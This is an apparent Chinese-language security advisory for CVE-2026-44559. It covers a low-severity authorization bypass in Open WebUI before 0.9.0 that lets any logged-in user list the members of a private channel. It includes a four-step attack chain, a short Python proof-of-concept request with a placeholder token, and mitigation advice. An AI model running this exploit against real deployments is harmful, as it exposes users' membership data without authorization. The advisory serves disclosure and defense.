IPBUF安全漏洞报告
English
CVE-2026-44559 CVSS 4.3 中危

CVE-2026-44559 Open WebUI权限绕过漏洞

披露日期: 2026-05-15

漏洞信息

漏洞编号
CVE-2026-44559
漏洞类型
权限绕过
CVSS评分
4.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Open WebUI

相关标签

权限绕过信息泄露Open WebUIAPI安全CVE-2026-44559

漏洞概述

Open WebUI是一个自托管的人工智能平台。在0.9.0版本之前,系统存在一个安全漏洞。具体而言,GET /api/v1/channels/{id}/members接口仅对群组和私信类型的频道进行成员权限检查,而未对标准频道(包括私有频道)执行访问权限验证。任何经过身份验证的攻击者,只要知道私有频道的UUID,即可利用此漏洞枚举该频道的所有成员列表。该问题已在0.9.0版本中修复。

技术细节

该漏洞源于Open WebUI后端API逻辑中的访问控制缺陷。在处理GET /api/v1/channels/{id}/members请求时,代码逻辑(第467-469行)仅针对`group`和`dm`类型的频道调用`channel_has_access`函数来验证请求者是否为频道成员。然而,对于标准频道类型,代码直接查询并返回成员列表,跳过了权限校验步骤。攻击者无需拥有该私有频道的访问权限,只需获取到目标频道的UUID(这可能通过猜测、其他信息泄露接口或社会工程学获得),即可构造特定HTTP请求发送至受影响端点。由于系统未拦截,攻击者将收到包含该频道所有成员信息的JSON响应。这导致敏感的用户组织架构信息泄露,可能为后续的定向攻击提供数据支持。CVSS向量CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N表明该漏洞利用难度低,且需要低权限用户身份,主要造成机密性影响。

攻击链分析

STEP 1
信息收集
攻击者在目标Open WebUI平台注册账号并获取有效的身份认证令牌(Token)。
STEP 2
探测目标
攻击者通过猜测、枚举或其他途径获取目标私有频道的UUID标识符。
STEP 3
发送请求
攻击者构造GET请求访问/api/v1/channels/{id}/members接口,并在Header中携带认证Token。
STEP 4
获取数据
由于系统未校验私有频道的访问权限,服务器直接返回该频道的成员列表,导致信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL configuration target_url = "http://localhost:3000" # The UUID of the private channel (Must be known by the attacker) channel_uuid = "abcd1234-5678-90ef-ghij-klmnopqrstuv" # Valid authentication token of a low-privileged user auth_token = "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..." # The vulnerable endpoint endpoint = f"{target_url}/api/v1/channels/{channel_uuid}/members" headers = { "Authorization": auth_token, "Content-Type": "application/json" } try: # Send the GET request to enumerate members response = requests.get(endpoint, headers=headers) if response.status_code == 200: print("[+] Exploit successful! Private channel members retrieved:") print(response.json()) else: print(f"[-] Request failed with status code: {response.status_code}") print(response.text) except Exception as e: print(f"[!] An error occurred: {e}")

影响范围

Open WebUI < 0.9.0

防御指南

临时缓解措施
建议立即升级至修复版本。若暂无法升级,应通过网络访问控制列表(ACL)限制对Open WebUI的访问,仅允许内部可信IP连接,并加强对API接口访问日志的审计,及时发现可疑的成员枚举行为。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表